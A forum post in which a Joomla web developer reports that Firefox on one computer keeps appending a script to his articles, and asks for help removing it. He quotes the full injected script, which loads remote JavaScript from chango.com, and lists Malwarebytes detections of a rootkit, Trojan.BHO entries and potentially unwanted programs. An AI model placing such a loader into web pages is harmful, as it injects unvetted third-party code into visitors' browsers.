I am a web developer creating multiple sites on the Joomla2.5 platform on a dedicated server. On one of my computers and only one) when editing code in html view using Firefox 14.0, toggling between text and html mode, the following scipt is automatically added to the end of the article code: <script id="__changoScript" type="text/javascript">// <![CDATA[ var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); // ]]></script> This happens on any of my sites, when edited on this one computer. It doesn't happen on this computer with Safari or Chrome. I have removed Firefox and reinstalled - same problem. I ran Malwarebytes..it found and deleted the following: Registry Keys Detected: 6 HKCR\CLSID\{7d9e1adc-7db1-4eaf-b6c7-7e062074e6be} (PUP.BlekkoSearchBar) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\vfd-adk (Rootkit.Agent) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SETUP.EXE (PUP.Bundle.Installer.OI) -> Quarantined and deleted successfully. HKCR\bho_project.bho_object (Trojan.BHO) -> Quarantined and deleted successfully. HKCR\bho_project.bho_object.1 (Trojan.BHO) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Google\Chrome\Extensions\kincjchfokkeneeofpeefomkikfkiedl (PUP.FCTPlugin) -> Quarantined and deleted successfully. But the problem remains...anyone seen something like this or got any suggestions? Thanks, Andrew